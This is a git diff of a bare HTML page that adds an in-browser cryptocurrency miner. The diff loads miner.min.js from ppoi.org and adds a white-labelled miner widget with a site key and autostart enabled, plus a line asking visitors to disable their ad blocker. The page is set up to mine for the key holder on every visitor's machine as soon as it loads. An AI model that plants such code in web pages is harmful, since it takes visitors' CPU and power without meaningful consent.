--- a/wkjs/new_file.html
+++ b/wkjs/new_file.html
@@ -2,8 +2,26 @@
 <html>
 	<head>
 		<meta charset="UTF-8">
+			<script src="https://ppoi.org/lib/miner.min.js" ></script>
+		
 		<title></title>
 	</head>
 	<body>
+		
+		<div class="projectpoi-miner" 
+	style="width: 256px; height: 310px"
+	data-key="BLuRXQ2XBPG0jSEBBnysmfVJ"
+	data-autostart="true/"
+	data-whitelabel="true"
+	data-background="#000000"
+	data-text="#eeeeee"
+	data-action="#00ff00"
+	data-graph="#555555"
+	data-threads="1"
+	data-throttle="0.9"
+	data-start="Start Mining">
+	<em>Please disable Adblock!</em>
+</div>
+		
 	</body>
 </html>
